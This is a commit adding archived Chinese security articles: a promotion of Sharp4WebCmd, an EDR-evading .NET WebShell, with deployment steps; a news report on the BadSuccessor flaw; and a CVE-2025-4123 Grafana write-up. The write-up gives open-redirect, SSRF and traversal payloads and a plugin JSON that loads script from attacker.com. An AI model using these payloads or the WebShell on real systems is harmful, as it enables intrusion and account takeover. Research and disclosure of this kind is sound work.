BadSuccessor 漏洞究竟有多严重?Akamai 和微软意见不一、.NET WebShell 绕过 EDR 监控,不调用 cmd.exe 也能实现命令执行、疑似俄罗斯APT28组织在全球攻击活动中利用0Day漏洞——每周威胁情报动态第223期 (05.16-05.22)、【CVE-2025–4123】:Grafana SSRF 及帐户接管利用、

This commit is contained in:
test 2025-05-24 04:22:03 +00:00
parent b3aa5e80c5
commit 2028777dd7
5 changed files with 808 additions and 1 deletions

View File

@ -14388,5 +14388,9 @@
"https://mp.weixin.qq.com/s?__biz=MzIyMjQwMTQ3Ng==&mid=2247491417&idx=1&sn=91d65e10514e6fcaf5d6ac79e6a89331": "【国际视野】美国国家标准与技术研究院推出识别IT漏洞利用的公式",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247490126&idx=1&sn=607c8cc65f9c89318775ac76f0b30de8": "【漏洞预警】Grafana未授权跨站点脚本攻击XSS&SSRF漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247523102&idx=2&sn=3eb6fe83ca06d69dbd0a16a7c73dcde3": "Grafana 紧急提前修复已被公开的XSS 0day漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247514405&idx=2&sn=95d5bbef875789924cf08280da99f6fe": "美国NIST、CISA联合提出漏洞利用概率度量标准"
"https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247514405&idx=2&sn=95d5bbef875789924cf08280da99f6fe": "美国NIST、CISA联合提出漏洞利用概率度量标准",
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247523102&idx=1&sn=13f091a5db5a8f5cb5088945cf935fee": "BadSuccessor 漏洞究竟有多严重Akamai 和微软意见不一",
"https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247499721&idx=1&sn=05d535e772a6012e657bcb94e57321dd": ".NET WebShell 绕过 EDR 监控,不调用 cmd.exe 也能实现命令执行",
"https://mp.weixin.qq.com/s?__biz=MzI0MTE4ODY3Nw==&mid=2247492644&idx=1&sn=e8e146f8565e64702729b69dad2a78f4": "疑似俄罗斯APT28组织在全球攻击活动中利用0Day漏洞——每周威胁情报动态第223期 05.16-05.22",
"https://mp.weixin.qq.com/s?__biz=MjM5Mzc4MzUzMQ==&mid=2650261177&idx=1&sn=73668e9ea66320d7b0d76167ac1dfd2c": "【CVE-20254123】Grafana SSRF 及帐户接管利用"
}

View File

@ -0,0 +1,178 @@
# .NET WebShell 绕过 EDR 监控,不调用 cmd.exe 也能实现命令执行
专攻.NET安全的 dotNet安全矩阵 2025-05-23 00:30
![图片](https://mmbiz.qpic.cn/mmbiz_gif/NO8Q9ApS1YibJO9SDRBvE01T4A1oYJXlTBTMvb7KbAf7z9hY3VQUeayWI61XqQ0ricUQ8G1FykKHBNwCqpV792qg/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
在红队渗透环境中,
攻防对抗的深度不断升级,安全厂商纷纷将注意力从传统病毒特征识别,转向对行为链的监控和阻断。
红队常用的 cmd.exe
 指令执行方式在越来越多的场景中被标记为高危操作。即便你伪装得再好只要触发了这一调用链如EDR、HIDS就可能进行阻断、弹窗、甚至自动封禁进程。
WebShell
 场景下系统命令执行成为重点监控对象w3wp.exe
 进程直接调用 cmd.exe
、powershell.exe
、regsvr32.exe
 等系统工具,几乎都逃不过终端检测与告警。
**01. 工具基本介绍**
Sharp4WebCmd
 是一款用 .NET 编写的 不依赖 cmd.exe 的 Web 指令执行工具
。本质上是一个 .aspx
 页面但其内部并不调用传统的 cmd.exe
 进行命令执行,而是**通过底层 Windows API 函数自行实现命令解释、创建子进程、重定向输出等核心功能**
![](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8rowxwfhPPkrny0DyicicyZpvia7B5yOIdWaaJYIa3X2OCxyf1eLibjp8VBZorlhNfQLh48IU42pBosw/640?wx_fmt=jpeg&from=appmsg "")
这种方式从行为上规避了 cmd.exe
 的调用路径,使得工具在某些 EDR 环境中具有极强的低特征执行能力,适合部署于目标服务器的 IIS 环境中,以实现更加隐蔽的命令控制。
**02. 工具实战用法**
其核心绕过点在于让防护软件看不到cmd.exe而又能完成相同的执行任务。
## 2.1 核心原理
传统 WebShell 调用命令的方式通常如下,
该调用路径非常直接,因此在行为树中极易被安全软件识别:
```
Process.Start("cmd.exe","/c whoami");
```
Sharp4WebCmd 的策略是:利用 Windows 等底层 API 自行构造执行环境;实现类似 cmd 的参数解析与子进程管理;避免创建 cmd.exe 进程,直接执行系统命令;可选重定向输出,通过 HTTP 返回命令执行结果。
## 2.2 部署方式
将编译后的 Sharp4WebCmd.aspx
 页面上传到目标服务器的 Web 根目录或子目录下,访问页面时,通过 GET 参数传入命令内容:
```
http://<目标地址>/Sharp4WebCmd.aspx?c=whoami%20/all
```
参数 c
 表示要执行的系统命令;页面返回值即为命令执行结果,通常为纯文本格式,如下图所示。
![](https://mmbiz.qpic.cn/mmbiz_png/NO8Q9ApS1Y8rowxwfhPPkrny0DyicicyZpqowj8aLzWAMu0RY2VGbYGr1CohGAib0MGORE5a9oO1TBqAayFRs0TicQ/640?wx_fmt=png&from=appmsg "")
在安全设备的日志中,你可能会发现 并无 cmd.exe 启动痕迹,也不容易构建出完整的进程调用链。
上,**Sharp4WebCmd**
 是一款技术上巧妙、战术上实用的 Web 指令执行工具。它通过规避对系统 cmd.exe
 的直接依赖,在对抗日益智能的行为检测时提供了一条全新的绕行路线。
对于红队而言,这是一种值得深入研究与灵活应用的攻击方式;而对于蓝队来说,也正提醒着防御策略不能仅依赖于进程路径特征,还需关注命令执行的本质行为与上下文链路。文章涉及的工
具已
打包在星球,感兴趣的朋友可以加入自取。
**03.NET安全扩展学习**
以上相关的知识点已收录于
新书《.NET安全攻防指南》全书共计25章总计1010页分为上下册横跨.NET Web代码审计与红队渗透两大领域。
**上册深入剖析.NET Web安全审计的核心技术帮助读者掌握漏洞发现与修复的精髓下册则聚焦于.NET逆向工程与攻防对抗的实战技巧揭秘最新的对抗策略与技术方法。**
**04. 技术精华内容**
从漏洞分析到安全攻防,我们涵盖了 .NET 安全各个关键方面,为您呈现最新、最全面的 .NET 安全知识,下面是公众号发布的精华文章集合,推荐大伙阅读!
[](https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247499267&idx=2&sn=1462cf23c9a8568cc80705d2d3a1a69e&scene=21#wechat_redirect)
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8A7Qhn1ssuqNzv0iceS7ZhOuZ0AO4P1eFeG2xTdR2V6GWibiaxO2RenUJzrwOfvsdqofibI6H2uY0CLQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247493952&idx=4&sn=db68011fb075c1d02268811163646b53&chksm=fa5947adcd2ecebbb1ca6659f289a5e344e37d1136fe0bd9272b5578e4c71bb19bb250e934d3&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247495167&idx=1&sn=9280c55fdc7c9146e549be470cf9f120&chksm=fa594312cd2eca04bfe8fd1fd3890b389d9c700b9b69d897f919addac399bab4f4d2e55f6b4f&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490722&idx=2&sn=c9807daa5548e139a0c67303cb26882a&chksm=fa5ab24fcd2d3b59a85be03e69c655ffd644e8458bc2ec3f572da4b40b43e5003fda756f35b4&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490703&idx=2&sn=e7db1ff662e5b41d9a1806fbdf33e204&chksm=fa5ab262cd2d3b7470f029b9a07d1dd3611e63be910b01a601144efe7d84b5f016f488a354cf&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490700&idx=2&sn=e8a865ada7c743e77fb9e953c5da74b1&chksm=fa5ab261cd2d3b7736387eddfc8524a378a1604552d0c9b55476646f9e8275f48818aab8acad&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247488736&idx=2&sn=d24aaa297c51eb620ccdf67af513086d&chksm=fa5aba0dcd2d331bbb22f3f5657199d718c90efed42fcb9cb67ec23d342f887c117e4858f1cb&scene=21#wechat_redirect)
**05. 加入安全社区**
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最专业的技术知识库之一 **1200+**
 成员一起互动学习。星球主题数量近 **600+**
,精华主题 
230+
PDF文档和压缩包 
300+ 
。从Web应用到PC端软件应用无论您是初学者还是经验丰富的开发人员都能在这里找到对应的实战指南和最佳实践。
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y9AiaXibTRdEnEfYuQx76FjZVjmyEWtIaDuDePFFmyRqggiaq2k47pLoib9GZtUCOhaP40WPlhvbiaKZVg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 20+专栏文章
星球文化始终认为授人以鱼不如授人以渔!星球整理出**20+**
个专题栏目涵盖 **.NET安全 点、线、面、体等知识范围**
,助力师傅们实战攻防!其中主题包括.NET  内网攻防、漏洞分析、内存马、代码审计、预编译、反序列化、WebShell免杀、命令执行、工具库等等。
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopa90SJRuwnLy9uZV4icrXiaZlJPQlYJWXTw8HCrF9oTcE3DDgrdFnXo2BA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 海量资源和工具
截至当前dot.Net安全矩阵星球社区汇聚了 
**600+**
 个实用工具和高质量PDF学习资料。这些资源涵盖了攻防对抗的各个方面在实战中能够发挥显著作用为对抗突破提供强有力的支持。
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopaqVZW8XsALVA4FNiaj32q8npN82VSeqSKb4fQvLiczFNs0099VRFVQwPA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopa63ZXbX3YXLwoeNnjStcRtTbU9hoe6ecO5hhkj2apG1I6tKlkpz5GaQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 专属成员交流群
我们还有多个成员专属的
**内部星球陪伴群**
,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
![图片](https://mmbiz.qpic.cn/mmbiz_png/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopaAiaouHb6HYza539m9v0ykDoD2JezaArDZBPlJInuabf6XsduzVcjZ0Q/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
## 已入驻的大咖们
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题社区中发布很多
**高质量的.NET安全资源**
,可以说市面上很少见,都是干货。
![图片](https://mmbiz.qpic.cn/mmbiz_png/NO8Q9ApS1YibEkb2HkMVuw4d7qjcTYUtl04w8xDiaUaJxticro644uWw5XuJ6ZXCNXCticjYWjpXNmp3omQHUNFRPg/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
## 欢迎加入我们
dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术定位于高质量安全攻防星球社区也得到了许多师傅们的支持和信任通过星球深度连接入圈的师傅们一起推动.NET安全高质量的向前发展。
**星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!**
![图片](https://mmbiz.qpic.cn/mmbiz_jpg/NO8Q9ApS1Y8xRheDpQ7NsESosdNZUopag09JtYcKpucjZPAlfeqC1ovcQvhrkemAzbURDaVF3InmpQshiatDnyQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,94 @@
# BadSuccessor 漏洞究竟有多严重Akamai 和微软意见不一
Ryan Naraine 代码卫士 2025-05-23 10:34
![](https://mmbiz.qpic.cn/mmbiz_gif/Az5ZsrEic9ot90z9etZLlU7OTaPOdibteeibJMMmbwc29aJlDOmUicibIRoLdcuEQjtHQ2qjVtZBt0M5eVbYoQzlHiaw/640?wx_fmt=gif "")
  
聚焦源代码安全,网罗国内外最新资讯!
**编译:代码卫士**
**Akamai 公司的安全团队公开披露了位于 Windows Server 2025中的一个未修复提权漏洞 “BadSuccessor” 的利用详情。该漏洞可导致攻击者攻陷活动目录中的任意用户。**
Akamai 公司的研究员 Yuval Gordon 提到微软安全响应中心证实了该漏洞的有效性但将其评级为“中危”级别并表示将“在未来”修复。Gordon 发表博客文章(包含概念验证),说明了如何将少有人知的服务账号迁移特性转变为严重的安全风险并提到,“虽然我们感谢微软的回应,但我们不认可对它的严重性评估”。
Gordon 提到,该漏洞位于被分配的服务管理账号 (dMSAs) 中它是在Server 2025 中引入的一个全新类。dMSAs 旨在取代笨重的遗留服务账号但Gordon 发现它们继承了原始账号所拥有的权限。
他发布技术文档,说明了低权限用户如何能够一步步作为合法继承者创建一个新的 dMSA。Gordon 表示,“这就是域控制器将我当作合法继承者对待的所有要求。谨记:不涉及群成员变更、没有触及与管理员组以及不需要将可疑的 LDAP 写入真实的权限账号。只需两个属性变更新的对象就会成为继承者而KDC永远不会质疑这种“血统”如果存在链接那么就会获得这些权限。我们没有更改任何一个组成员没有提权任何现有账号也没有触发任何传统的提权警报。”
研究员调查客户遥测数据后发现在91%的环境中,至少有一个非管理员用户已经在组织机构单元层面拥有问题重重的 Create-Child 权限。Gordon 注意到这些权限足以创建一个dMSA但微软认为攻击者需要“提权访问的特定权限”因此评级更低。由于Windows Server 2025 域控制器默认启用 dMSA 支持因此Gordon 认为组织机构只通过将2025 DC 添加到现有的活动目录中,就会继承这一风险。
他表示促使Akamai 在4月1日通知微软后但最终公开该漏洞的原因是微软表示不会立即打补丁。Gordon 表示“他们将它评级为中危漏洞并表示目前不满足立即打补丁的门槛。”他指出该漏洞引入了一个此前未知的且影响巨大的绝对路径使得在OU上拥有 CreatChild的任意用户很有可能攻陷该域名中的任何用户“并获得类似Replicating Directory Changes 的权限,执行 DCSync 攻击。另外,我们未发现针对 CreateChild 权限,或者更确切地说,适用于 dMSA的CreateChild 的行业实践或工具,这种情况非常令人担忧。我们认为它加剧了漏洞的隐秘性和严重性。”
这种在补丁发布前披露漏洞的行为又引发了长久以来的负责任披露问题。在社交媒体上,一些研究员批评 Akamai 公司在补丁可用之前发布完整攻击详情的行为,而一些传统黑客则认为微软历来存在分类错误以及拒绝修复严重漏洞的问题。
在官方补丁未发布之前Akamai 公司已发布检测查询、日志指南以及脚本,来定位可创建 dMSA 的责任人。
****
代码卫士试用地址:
https://codesafe.qianxin.com
开源卫士试用地址https://oss.qianxin.com
**推荐阅读**
[通过Spring Boot 绕过Akamai WAF并触发RCE](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247515059&idx=2&sn=440e117183a0cd8fc8ad083796317496&scene=21#wechat_redirect)
[微软5月补丁星期二值得关注的漏洞](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247523008&idx=3&sn=9a842c823e7d8913c5cc1c0f69a9cda4&scene=21#wechat_redirect)
[8天这个被微软认为“低可利用性”的漏洞即遭利用](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522819&idx=1&sn=005966b8a5fb21a2ac90627b6b0075bc&scene=21#wechat_redirect)
[微软利用AI从开源引导加载器中找到20个0day漏洞](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522638&idx=1&sn=15b5a925b5a9f1eecca2dc4a721a63a9&scene=21#wechat_redirect)
**原文链接**
https://www.securityweek.com/akamai-microsoft-disagree-on-severity-of-unpatched-badsuccessor-flaw/
题图:
Pixabay Licen
se
****
**本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。**
![](https://mmbiz.qpic.cn/mmbiz_jpg/oBANLWYScMSf7nNLWrJL6dkJp7RB8Kl4zxU9ibnQjuvo4VoZ5ic9Q91K3WshWzqEybcroVEOQpgYfx1uYgwJhlFQ/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/oBANLWYScMSN5sfviaCuvYQccJZlrr64sRlvcbdWjDic9mPQ8mBBFDCKP6VibiaNE1kDVuoIOiaIVRoTjSsSftGC8gw/640?wx_fmt=jpeg "")
**奇安信代码卫士 (codesafe)**
国内首个专注于软件开发安全的产品线。
   ![](https://mmbiz.qpic.cn/mmbiz_gif/oBANLWYScMQ5iciaeKS21icDIWSVd0M9zEhicFK0rbCJOrgpc09iaH6nvqvsIdckDfxH2K4tu9CvPJgSf7XhGHJwVyQ/640?wx_fmt=gif "")
 
觉得不错,就点个 “
在看
” 或 "
” 吧~

View File

@ -0,0 +1,293 @@
# 【CVE-20254123】Grafana SSRF 及帐户接管利用
原创 骨哥说事 骨哥说事 2025-05-23 16:00
<table><tbody><tr><td data-colwidth="557" width="557" valign="top" style="word-break: break-all;"><h1 data-selectable-paragraph="" style="white-space: normal;outline: 0px;max-width: 100%;font-family: -apple-system, system-ui, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;font-size: 18px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="color: rgb(255, 0, 0);"><strong><span style="font-size: 15px;"><span leaf="">声明:</span></span></strong></span><span style="font-size: 15px;"></span></span></strong><span style="outline: 0px;max-width: 100%;font-size: 18px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="font-size: 15px;"><span leaf="">文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。</span></span></span></h1></td></tr></tbody></table>#
#
****# 防走失https://gugesay.com/archives/4339
******不想错过任何消息?设置星标****↓ ↓ ↓**
****
#
![](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jlbXyV4tJfwXpicwdZ2gTB6XtwoqRvbaCy3UgU1Upgn094oibelRBGyMs5GgicFKNkW1f62QPCwGwKxA/640?wx_fmt=png&from=appmsg "")
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fxXgA1OSeiaF8U8qHxHIxEKJfV6THy1BttL5jibsmM1icWzAibtSVe6DSWQ/640?wx_fmt=png&from=appmsg "")
# 前言
当 Web 应用程序采用 URL 参数并将用户重定向到指定的 URL 而不对其进行验证时,就会发生开放重定向。
/redirect?url=https://evil.com
 --> 302 重定向) --> https://evil.com
这本身可能看起来并不危险,但这种类型的漏洞是发现两个独立漏洞的起点:完全读取 SSRF 和帐户接管。
本文就来详细讲解如何找到这两个漏洞的完整过程。
# 为什么选择Grafana
Grafana 是一个开源分析平台,主要使用 Go 和 TypeScript 构建,用于可视化来自 Prometheus 和 InfluxDB 等来源的数据。
在这个 Web 应用程序中能够找到漏洞将是一个很好的挑战,因此白帽小哥下载了源代码并开始调试——尽管这是小哥第一次使用 Go他仍然决定专注于应用程序中未经身份验证的部分。
# 入口点
查看 api/api.go 中定义的所有未经身份验证的端点:
```
...// not logged in viewsr.Get("/logout", hs.Logout)r.Post("/login", requestmeta.SetOwner(requestmeta.TeamAuth), quota(string...r.Get("/login/:name", quota(string(auth.QuotaTargetSrv)), hs.OAuthLogin)r.Get("/login", hs.LoginView)r.Get("", hs.Index)// authed viewsr.Get("/", reqSignedIn, hs.Index)r.Get("/profile/", reqSignedInNoAnonymous, hs.Index)...
```
# 功能性
一个负责处理静态路由的函数成功引起了白帽小哥的注意:
```
func staticHandler(ctx *web.Context, log log.Logger, opt StaticOptions) bool {    if ctx.Req.Method != "GET" && ctx.Req.Method != "HEAD" {returnfalse } file := ctx.Req.URL.Pathfor _, p := range opt.Exclude {if file == p {   returnfalse  } } // if we have a prefix, filter requests by stripping the prefixif opt.Prefix != "" {if !strings.HasPrefix(file, opt.Prefix) {   returnfalse  }  file = file[len(opt.Prefix):]if file != "" && file[0] != '/' {   returnfalse  } } f, err := opt.FileSystem.Open(file)if err != nil {returnfalse }   ..............}
```
该函数用于根据用户输入从系统中检索文件,白帽小哥第一个想法是尝试使用路径遍历来加载任意文件,例如 ../
 大法或类似技巧。
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fg5iapIhGfdvEZLWWuQZGEoTwXjYc0KFSKsqvKlT1xyUDniceDprKFqJQ/640?wx_fmt=png&from=appmsg "")
如果请求 /public/file/../../../name
 时,路径将被清理并解析为 /staticfiles/etc/etc/name
,从而有效地阻止对预期目录之外的非法访问。
此外,如果解析的最终路径指向文件夹, 则 StaticHandler 函数会检查其中的默认文件 — 通常从该目录提供 /index.html
```
if fi.IsDir() {    // Redirect if missing trailing slash.    if !strings.HasSuffix(ctx.Req.URL.Path, "/") {        path := fmt.Sprintf("%s/", ctx.Req.URL.Path)        if !strings.HasPrefix(path, "/") {            // Disambiguate that it's a path relative to this server            path = fmt.Sprintf("/%s", path)        } else {            // A string starting with // or /\ is interpreted by browsers as a URL, and not a server relative path            rePrefix := regexp.MustCompile(`^(?:/\\|/+)`)            path = rePrefix.ReplaceAllString(path, "/")        }        http.Redirect(ctx.Resp, ctx.Req, path, http.StatusFound)        return true    }    file = path.Join(file, opt.IndexFile)    indexFile, err := opt.FileSystem.Open(file)    ....}
```
如上所见,如果最终文件是一个目录,并且提供的路由 (/public/build
 不以 / 结尾则服务器将重定向到同一路径并z在尾部附加 /。
```
GET /public/build HTTP/1.1Host: 192.168.100.2:3000
```
```
HTTP/1.1 302 FoundLocation: /public/build/
```
这种重定向行为是开放重定向漏洞发生的地方,因此接下来深入研究一下。
# 目标
假设有一个场景,应用程序根据提供的路由进行重定向,因此最终的重定向 URL 将始终以 / 开头。
那么我们的目标是创建一个路由,当请求时,该路由会重定向到以 / 开头的有效完整 URL例如
- attacker.com/...
 --> 表示协议相对 URL它使用与当前页面相同的协议 HTTPS
- /\attacker.com/...--> /\ 会执行相同的操作
# 问题及解决方案
要实现重定向功能,我们需要一个以 /public/
 开头的路由并在传递给 opt
 FileSystem.Openfile
将其解析为有效目录。
从 /public/\attacker.com/../..
 开始,它解析为空字符串 " "
,然后附加到 /staticfiles/etc/etc/
触发 if fi.isDir{}
代码流。
/public/\attacker.com/../..-->/\attacker.com/../.. --> "" -->/staticfiles/etc/etc/+"" --> fi.isDir() TRUE
现在有一种方法可以将任何Payload注入它将被opt.FileSystem.Open(file)
解释为一个文件夹。
一旦进入 isDir
 处理部分,/public/\attacker.com/../..
 路径就会到达 http.Redirect
 函数,问题在于,此函数还会解析路径,这会导致重定向路径为/
```
if fi.IsDir() {    ...        //path is "/public/\attacker.com/../.." but the final redirect is "/"        http.Redirect(ctx.Resp, ctx.Req, path, http.StatusFound)        return true    ...}
```
如果请求 /public/\attacker.com/../..
```
GET /public/\attacker.com/../.. HTTP/1.1Host: 192.168.100.2:3000
```
```
HTTP/1.1 302 FoundLocation: /
```
因此我们需要创建一条路径,其中在加载文件时,/../../..
 通过 opt.FileSystem.Open(file)
 被解析但在执行重定向时http.Redirect()
  中仍然未解析。
在每种情况下,路径的解析方式都不同:
- opt.FileSystem.Open(file)
 预期为一个系统文件
- http.Redirect(path)
预期为一个 URL 路径
- opt.FileSystem.Openfile
 将 ?
视为普通字符
- http 的 Redirectpath
 将?
 解析为 URL 参数的开头
这意味着 /public/\attacker.com/?/../../../..
 将被如下处理,
 opt.FileSystem.Open()
 — >
- /public/\attacker.com/?/../../../..
 将被解析为 ""
 ->  /staticfiles/etc/etc/
+""
 有效文件夹。
 http.redirect
 →
- /public/\attacker.com/?/../../../..
 --> 后面的任何内容 ?
 都被视为查询字符串,而不是作为路径的一部分进行解析。
请求 ?
 -> %3f
```
GET /public/\attacker.com/%3f/../.. HTTP/1.1Host: 192.168.100.2:3000
```
```
HTTP/1.1 302 FoundLocation: /public/\attacker.com/?/../../
```
# 最终 Payload
该 URL /public/\attacker.com/?/../../../..
 需要解析为以 /\
开头的完整 URL。
使用路径: /public/../\attacker.com/?/../../../..
,当 http.Redirect
 解析路径 时,会删除 /public
 部分。
```
GET /public/../\attacker.com/%3f/../../../../../.. HTTP/1.1Host: 192.168.100.2:3000
```
```
HTTP/1.1 302 FoundLocation: /\attacker.com/?/../../../../../../
```
流程示意图:
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fp3PK9hIGQibLiaBH9aSbuDfVVzuAS7xMUXGp5iczO0pn5rUkCu9lsHb7A/640?wx_fmt=png&from=appmsg "")
# 完整读取 SSRF
开放重定向本身不会产生任何严重的安全影响,因此需要将其与另一个功能链接起来。
Grafana 有一个名为 /render
的端点,用于根据提供的路径生成图像。
```
// renderingr.Get("/render/*", requestmeta.SetSLOGroup(requestmeta.SLOGroupHighSlow), reqSignedIn, hs.RenderHandler)
```
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fshqPktO1KOtm2pGyicEGNLK4kTJSKNtvYPQpkb0wd5ON18GReOrJ1GA/640?wx_fmt=png&from=appmsg "")
此端点使用无头浏览器来呈现用户指定的路由的 HTML它只接受相对 URL 路径 /route
,不接受绝对 URL https://...
但是,如果使用找到的 open redirect 重定向到内部服务呢?
首先,尝试将 /render/public/..%252f%255Cgoogle.es%252f%253F%252f..%252f.. google.es
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fFB6WibOXibjicy2r096jvTIicYSxpmuXZFMdnnnWJJw0foAP4zSSyeBkKA/640?wx_fmt=png&from=appmsg "")
然后,设置了一个无法从外部访问的内部服务:
尝试用 /render/public/..%252f%255C127.0.0.1:1234%252f%253F%252f..%252f.. 127.0.0.1:1234
:
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4f8SsMkJkqm5YPThY1LcyqRwcYRGk723U7X1CVVctqwsqNyjdULlUOHQ/640?wx_fmt=png&from=appmsg "")
通过该漏洞,便能够完全读取内部服务,由于浏览器用于渲染,因此我们甚至可以通过制作面向内部服务的表单来发送 POST 请求。
此外,该漏洞的前提需要登录才能利用,因此我们在未登录的前提下无法从中获得任何东西。
# 通过 XSS 进行帐户接管
## 客户端路径遍历
Grafana 的 Client 端代码的很大一部分允许 Client 端路径遍历。
例如,当在浏览器中加载 /invite/1
 JavaScript 会向 /api/user/invite/1
 发出请求以检索邀请信息。
但是,如果加载 /invite/..%2f..%2f..%2f..%2froute
 ,则 JavaScript 会解析路径遍历并最终加载 /route
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fzwlPYo1BRJXwb3K25VnSHlg6CZeF0FlDOic8lQib9Z6wmibBCOeK4iaRzg/640?wx_fmt=png&from=appmsg "")
这创造了一个完美的场景来强制 JavaScript 加载开放重定向而该重定向反过来会从我们的服务器获取一个特别定制的JSON。
但首先,我们需要找到一个以不安全的方式加载内容的端点,并利用它来执行 JavaScript。
## 加载恶意 javascript 文件
可以使用 /a/plugin-app/explore
 加载和管理插件应用程序。
此功能的 JavaScript 从 URL 中提取插件应用程序名称,并使用它从 /api/plugins/plugin-app/settings
 请求插件信息。
/api/plugins/plugin-app/settings
 内容如下:
```
{    "name": "plugin-app",    "type": "app",    "id": "plugin-app",    "enabled": true,    "pinned": true,    "autoEnabled": true,    "module": "/modules/..../plugin-app.js", //js file to load    "baseUrl": "public/plugins/grafana-lokiexplore-app",    "info": {        "author": {            "name": "Grafana"            ...        }    }    ...}
```
/a/plugin-app/explore
加载该文件,并执行 “module” 参数中提供的 JavaScript。
/a/plugin-app/explore
 容易受到客户端路径遍历的影响,这允许我们在服务器上加载任意路由,而不是 /api/plugin-app/settings
这允许我们加载打开的重定向,因此,获取自己的恶意 JSON其中包含了我们想要的任何 JavaScript 文件。
通过利用所有必要的 JS 和 JSON 文件设置我们自己的服务器。只需要托管如下 JSON
```
{    "name": "ExploitPluginReq",    "type": "app",    "id": "grafana-lokiexplore-app",    "enabled": true,    "pinned": true,    "autoEnabled": true,    "module": "http://attacker.com/file?js=file", //malicious js file    "baseUrl": "public/plugins/grafana-lokiexplore-app",    "info": {        "author": {...}    }    ...}
```
加载此路由, /a/..%2f..%2f..%2fpublic%2f..%252f%255Cattacker.com%252f%253Fp%252f..%252f..%23/explore
 ,从而利用客户端路径遍历和开放重定向。
结果展示:
